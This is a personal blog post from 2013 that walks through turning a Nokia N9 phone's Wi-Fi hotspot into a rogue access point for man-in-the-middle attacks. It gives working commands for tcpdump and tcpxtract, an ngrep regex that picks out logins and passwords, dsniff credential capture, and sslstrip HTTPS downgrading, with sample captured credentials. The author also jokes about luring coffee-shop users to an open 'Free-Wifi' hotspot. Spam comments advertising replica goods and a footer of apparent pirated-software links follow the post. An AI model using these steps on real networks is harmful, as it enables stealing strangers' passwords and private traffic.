true-binary.com – code is poetry…

HOME

the n9 as an evil access point #mitm

01.02.2013 (1:22 am) – Filed under: computing, debian, linux, meego

Prelude: I used it in all these tools for development and privat use, e.g. you shouldn’t use it in a coffee-shop, call your hotspot “Free-Wifi” and turn the encryption off :P

The last month I looked for a way to use my n9 as package sniffer and I figured out some usefull stuff …

… my train of thought was – how can I sniff whatever it’s transmitted through my stock wifi-hotspot (joikuspot) …

… so here’s a guideline of what I got working and how it works:

mitm

My device:

Nokia n9, Linux RM 696 2.6.32.54-dfl-161-20121301 open mode, meego Harmattan PR1.3

Pre-dependencies:


I AM WORKING IN OPEN MODE, SO I DONT KNOW IF IT WORKS WITH THE STOCK KERNEL!!!


1. tcpdump + tcpxtract
2. ngrep
3. dsniff [dsniff itself]
4. ssldump?


1. tcpdump + tcpxtract:

tcpdump is a very powerful package analyzer – you can dump nearly all traffic with this tool …

tcpxtract is a tool to rebuild data from tcpdump-pcap files…

let’s install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8

I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

# we are starting tcpdump on interface [-i] wlan0, set the snaplen to 1500 [-s], don’t convert addresses to names [-n] and listen only on port 80 [port 80]

open a website on the client … tcpdump will capture it.

when you think you are finished, kill tcpdump [crtl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/

Found file of type “html” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000000.html
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000001.png
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000002.png
Found file of type “png” in session [192.168.20.20:26079 -> 82.150.199.80:20480], exporting to tcpxtract_out/00000003.png

Found file of type “png” in session [92.122.212.57:20480 -> 192.168.20.20:30431], exporting to tcpxtract_out/00000021.png

it looks like this.

I LIKE! :)

2. ngrep

ngrep is a very powerful tool as well – you can analyze traffic live…

I’m going to show you how to filter the traffic by some regular expressions to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install lipcap0.8

here’s ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep ngrep_1.45.ds2-9_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin [again ;) ]:

/home/user/dev/sniffer # ngrep ‘[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)’ -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (123.123.123.123/255.255.255.255)
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T 123.123.123.123:61342 -> 82.150.199.80:80 [AP]
log=ohyes&pwd=itworks&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.true-binary.com%2Fwp-admin%2F&testcookie=1

# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (i had segment faults when I started it on wlan0 … from time to time), -l to make the stdout line buffered [-l] (usefull when capturing to a file {2>&1 >ngrep.log}) and filter the traffic by ports [port 80 or port 25 or port 110]

… What it doesn’t do is capturing htaccess logins, I use dsniff for it.

3. dsniff

dsniff? – omg, it’s awesome! it includes:

arpspoof  – Send out unrequested (and possibly forged) arp replies.
dnsspoof  – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff    – password sniffer for several protocols.
filesnarf – saves selected files sniffed from NFS traffic.
macof     – flood the local network with random MAC addresses.
mailsnarf – sniffs mail on the LAN and stores it in mbox format.
msgsnarf  – record selected messages from different Instant Messengers.
sshmitm   – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow     – SSH traffic analyser.
tcpkill   – kills specified in-progress TCP connections.
tcpnice   – slow down specified TCP connections via “active” traffic shaping.
urlsnarf  – output selected URLs sniffed from HTTP traffic in CLF.
webmitm   – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy    – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

dsniff does have some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here’s dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb

whooop! – should be working now :)

dsniff itself is very simple to use – it has a build-in filter. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

—————–
01/31/13 10:45:02 tcp 123.123.123.123.61056 -> p111.111.111.111.some.isp.com.80 (http)
GET / HTTP/1.0
host: server.idonttellyou.com
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

—————–
01/31/13 10:47:22 tcp 123.123.123.123.57838 -> 82.150.199.80.21 (ftp)
USER thisis
PASS ftpdump

# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] … again I got segment faults when listening on wlan0.

4. sslstrip?

sslstrip strips down your https connections to http …

… I found a way to pipe your local connection through sslstrip, but not with the hotspot connected client.

All I did was to modify my APN connection – I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode “manual”) – deactivate and activate the connection again and fire up sslstrip.

An alternative for testing is to set the http proxy in firefox.

What I figured out was: The Joikuspot doesn’t use the APN entry from the phone settings, because I tried to add a second APN with some changed settings and it won’t show up in the properties of Joikuspot. – Maybe that’s why it doesn’t take the proxy settings from the APN … anyway, I’m still working on a workaround!

Here’s sslstrip-0.9 (taken from http://www.thoughtcrime.org/)

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode “manual”

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (www.facebook.com):
lsd=AVpjTuuG&email=thisis%40just.an&pass=example&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C

… I also got the webmitm/mitmproxy running (fakes SSL-certifications, but as it’s not a very efficient and elegant way to work, so I won’t explain it)

cheers!

9 Responses to “the n9 as an evil access point #mitm”

  1. sds Says:

    when i type this code in terminal:

    tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

    said:

    sh: tcpdump: not found

    but in installing of tcpdump and libpcap0.8

    said:

    you have installed latest version of tcpdump and libpcap0.8 !!!

    Can u learn this post step by step,plzzzzzzzzzzzzzzzz?

  2. christian louboutin shoe sale Says:

    christian louboutin pigalle patent christian louboutin love flats louis vuitton outlet bags louis vuitton outlet locations lady daffodil comfort louis vuitton outlet online store cheap michael kors watches outlet red bottoms cheap shoes cheap christian louboutin bags red bottoms shoes christian louboutin sale christian louboutin sale uk women christian louboutin shoes replica christian louboutin boots red christian louboutin heels red bottom heels sale christian louboutin flats shoes christian louboutin sandals 2013 christian louboutin galaxy christian louboutin pigalle red discount christian louboutin outlet christian louboutin wedges gucci sale gucci bags on sale gucci outlet store gucci leather purses gucci belt sale gucci wallets women authentic gucci sneakers cheap gucci watches tory burch sale shoes tory burch shoes tory burch bags outlet cheap tory burch flats tory burch sandals outlet cheap tory burch outlet tory burch handbags cheap oakley sunglasses sale oakley outlet replica oakley michael kors factory outlet] michael kors outlet sale michael kors outlet bags michael kors belts outlet michael kors handbag sale louis vuitton outlet store louis vuitton messenger bag cheap louis vuitton handbags louis vuitton purses cheap louis vuitton wallet sale louis vuitton mens belts replica louis vuitton handbags nike air max 2013 sale hollister kids store hollister sales discount hollister hoodies hollister jeggings hollister sweatpants hollister shirts sale hollister jeans hollister uk sale Hollister Outlet cheap christian louboutin shoes red bottoms sale christian louboutin discount christian louboutin sale outlet christian louboutin sale shoes replica christian louboutin christian louboutin heels on sale red bottom shoes christian louboutin spiked flats christian louboutin sandals 2013 christian louboutin galaxy sale christian louboutin pigalle discount christian louboutin shoes online christian louboutin wedges sale gucci on sale gucci messenger bag gucci shoes outlet gucci leather purses gucci belt sale cheap gucci wallets authentic gucci handbags cheap gucci bags tory burch outlet tory burch shoes discount tory burch purses tory burch flats on sale tory burch sandals outlet cheap tory burch purses tory burch handbags cheap replica oakleys fake oakleys wholesale oakley outlet sale military discount oakley sunglasses replica oakley watches michael kors outlet handbags] michael kors outlet bags michael kors belts michael kors purses cheap michael kors sunglasses sale michael kors wallets online michael kors watch sale michael kors watch sale louis vuitton outlet sale louis vuitton tote bag cheap louis vuitton belts louis vuitton purses cheap louis vuitton wallet sale louis vuitton mens belts authentic louis vuitton bags replica louis vuitton wallet louis vuitton sale wallets hollister kids store hollister sale discount hollister clothing online men hollister sweatpants hollister shirts hollister clothing hollister jeans hollister uk sale hollister outlets christian louboutin cork platform sandal christian louboutin candy pump shoes sale christian louboutin cork sandals birkenstock christian louboutin bloody mary ankle boots christian louboutin bibi 140 suede pumps chocolate

  3. louis vuitton outlet Says:

    air jordan 11 low green snakeskin jordan 13 for sale christian louboutin outlet real cheap jordan shoes retro 13 christian louboutin outlet real christian louboutin outlet christian louboutin outlet online cheap jordan 13 for sale christian louboutin outlet online christian louboutin outlet real jordan 11 bred christian louboutin outlet ny jordan cmft viz air 13 the michael kors outlet buy christian louboutin shoes online jordan 11 colorways hollister jeans dimensions louboutin sandalsmen christian louboutin shoes outlet sale hollister womens raincoat

  4. davyincic Says:

    cheap the federal government used some sort of

    “Baywatch” newborn Pamela Anderson is known for large, hot smokey eye and also soft, nude place. In such a cheap oakley sunglasses information a person discover ways Ralph Lauren Shoes to reach an totally attractive magenta dependent barbecue grills observation that will ralph lauren polo outlet excellent for polo ralph lauren uk a night out club clicking in your posse. It all a mulberry bags sale uk gorgeous make up seem that get people recognized even though, for instance Pamela Anderson, you cheap ralph lauren live in a city full of Your listers..

    Ok, I conducted all these blind tastes well before using buddies who seem to promised they are able to know the difference. cheap oakley sunglasses Give them several cheap oakley sunglasses several containers associated with Yellowtail after which it imagine that you is really high-priced. They’re going to make a choice released of course, along with believe it’s the high-priced jar..

  5. christian louboutin sale Says:

    jordan retro 11 low cheap air jordan 13 he got game michael kors outlet store cheap jordan retro 11 michael kors outlet store online michael kors outlet sale michael kors outlet online christian louboutin outlet jordan retro 11 real louis vuitton outlet best michael kors outlet jordan 13 black christian louboutin for men michael kors outlet ellenton michael kors bags outlet usa watches michael kors outlet womens jordan boots michael kors leesburg outlet MBT Women’s Casual Chapa Black michael kors outlet allen

  6. jordan 13 for sale Says:

    christian louboutin outlets michael kors outlet store cheap jordan 11 jordan 13 for sale jordan 13 for sale cheap jordan shoes size 13 jordan 13 flint michael kors outlet online michael kors outlet factory jordan 11 gamma blue louis vuitton outlet official watches michael kors outlet michael kors outlet md michael kors outlet cincinnati jordan 11 low for sale louis vuitton usa outlet air jordan 1 hi louboutin gym shoes with heels jordan shorts cheap daffodile christian louboutin
    jordan 13 for sale http://www.nazdak.net/cheap-jordan-shoes.html

  7. soccer jerseys wholesale Says:

    In the fancy dining isn’t in the budget, there are regarding other cafes in the park. My services are curing, taking away and as well , extinction.
    soccer jerseys wholesale http://www.customsoccerjerseyssale.com/

  8. louis vuitton outlet store location Says:

    air jordan 8 bugs bunny louis vuitton sunglasses 2013while louis vuitton monogram papillon 26 the new air jordan louis vuitton outlet online store oakley lifestyle sunglasses discount tys3579 lunette radar oakley oakley sunglasses breathless acceptance lyrics air jordan retro 6 black red oakley sunglasses parts 4 less vintage christian louboutin cheap louis vuitton albatros pouch cheap louis vuitton wallet on sale oakley 704 sunglasses x sport cheap christian louboutin atalanta glitter flat nu sac hermes occasion ray bans us oakley water jacket hermes parfums carmine jordan

  9. fitflop palma sandal Says:

    ray-ban rb3130 mac cosmetics outlet oakley sg8040 description fitflop desenzano mac cosmetics history
    fitflop palma sandal http://www.quiltsfromtheheart.org/patterns/fitflopdenmark/_Fitflop_Sling_Sko_050504.asp

Leave a Comment
(All comments are moderated before they appear on the site.)


 

windows 7 professional |
cubase 6 |
cleanmymac 2 |
microsoft excel 2013 |
right hemisphere deep exploration cad edition 6.5 |
matlab |
autodesk autocad 2012 |
adobe captivate 5 |
rosetta stone german |
microsoft publisher 2013 |
stellar phoenix data recovery 6 |
windows 7 ultimate |
apple motion 5 |
autocad autocad 2011 lt |
windows server 2008 enterprise |
corel draw x6 |
autodesk maya 2012 |
autodesk autocad design suite 2014 |
office 2013 professional |
microsoft works 9 |
microsoft office 2007 |
microsoft publisher 2013 |
nuance pdf converter professional 6 |
microsoft mappoint 2013 |
word 2007 |